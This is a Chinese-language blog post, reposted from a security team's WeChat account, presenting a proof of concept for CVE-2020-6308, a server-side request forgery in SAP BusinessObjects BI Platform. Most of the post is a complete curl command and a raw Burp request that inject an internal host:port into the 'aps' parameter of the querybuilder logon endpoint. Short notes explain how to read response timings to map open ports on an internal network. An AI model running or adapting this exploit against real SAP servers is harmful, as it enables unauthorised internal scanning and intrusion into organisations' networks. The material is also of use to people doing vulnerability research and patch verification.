CVE-2020-6308 SAP POC

  • A+
所属分类:安全工具


        SAP BusinessObjects商业智能平台(Web服务)版本--410、420、430,允许未经认证的攻击者注入任意值作为CMS参数,在内部网络上执行查询,否则外部无法访问。


        在下面的例子中,我将展示如何使用CuRL请求查看开放的端口。在下面的例子中,我有一台SAP主机(192.168.0.191)、一台攻击机(192.168.0.149)和另一台设备,如内部路由器(192.168.0.1)。


我们的SAP主机有以下端口开放。


而我们的内部路由器有以下开放端口:53,80,34573


time curl -i -s -k  -X $'POST'     -H $'Host: 192.168.0.191:8080' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 120' -H $'Origin: http://192.168.0.191:8080' -H $'Connection: close' -H $'Referer: http://192.168.0.191:8080/AdminTools/querybuilder/ie.jsp' -H $'Cookie: JSESSIONID=8EE4AA85EB930DEB7090187F4CB4711B; developer_samples_app_lastusr=admin; developer_samples_app_lastaps=192.168.0.191; developer_samples_app_lastaut=secEnterprise' -H $'Upgrade-Insecure-Requests: 1'     -b $'JSESSIONID=8EE4AA85EB930DEB7090187F4CB4711B; developer_samples_app_lastusr=admin; developer_samples_app_lastaps=192.168.0.191; developer_samples_app_lastaut=secEnterprise'     --data-binary $'aps=192.168.0.1:53&usr=admin&pwd=&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp'     $'http://192.168.0.191:8080/AdminTools/querybuilder/logon?framework='


测试以下有效载荷。


192.168.0.1:4 192.168.0.1:5 这里你可以看到封闭端口的测试结果,平均5ms左右。


192.168.0.1:22 192.168.0.1:80 这里你可以看到开放/过滤端口的测试时间结果,平均在5ms左右。


现在下面的情况并不理想,因为不同的路由,一些防火墙会影响结果。


下面显示了在Burp中请求的样子,APS参数是vulnearble注入点。更简单的PoC是只注入一个金丝雀标记值,然后等待触发。


POST /AdminTools/querybuilder/logon?framework= HTTP/1.1Host: 192.168.0.191:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 128Origin: http://192.168.0.191:8080Connection: closeReferer: http://192.168.0.191:8080/AdminTools/querybuilder/ie.jspUpgrade-Insecure-Requests: 1
aps=192.168.0.191&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp



参考献文:

https://github.com/InitRoot/CVE-2020-6308-PoC

本文始发于微信公众号(Khan安全团队):CVE-2020-6308 SAP POC

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: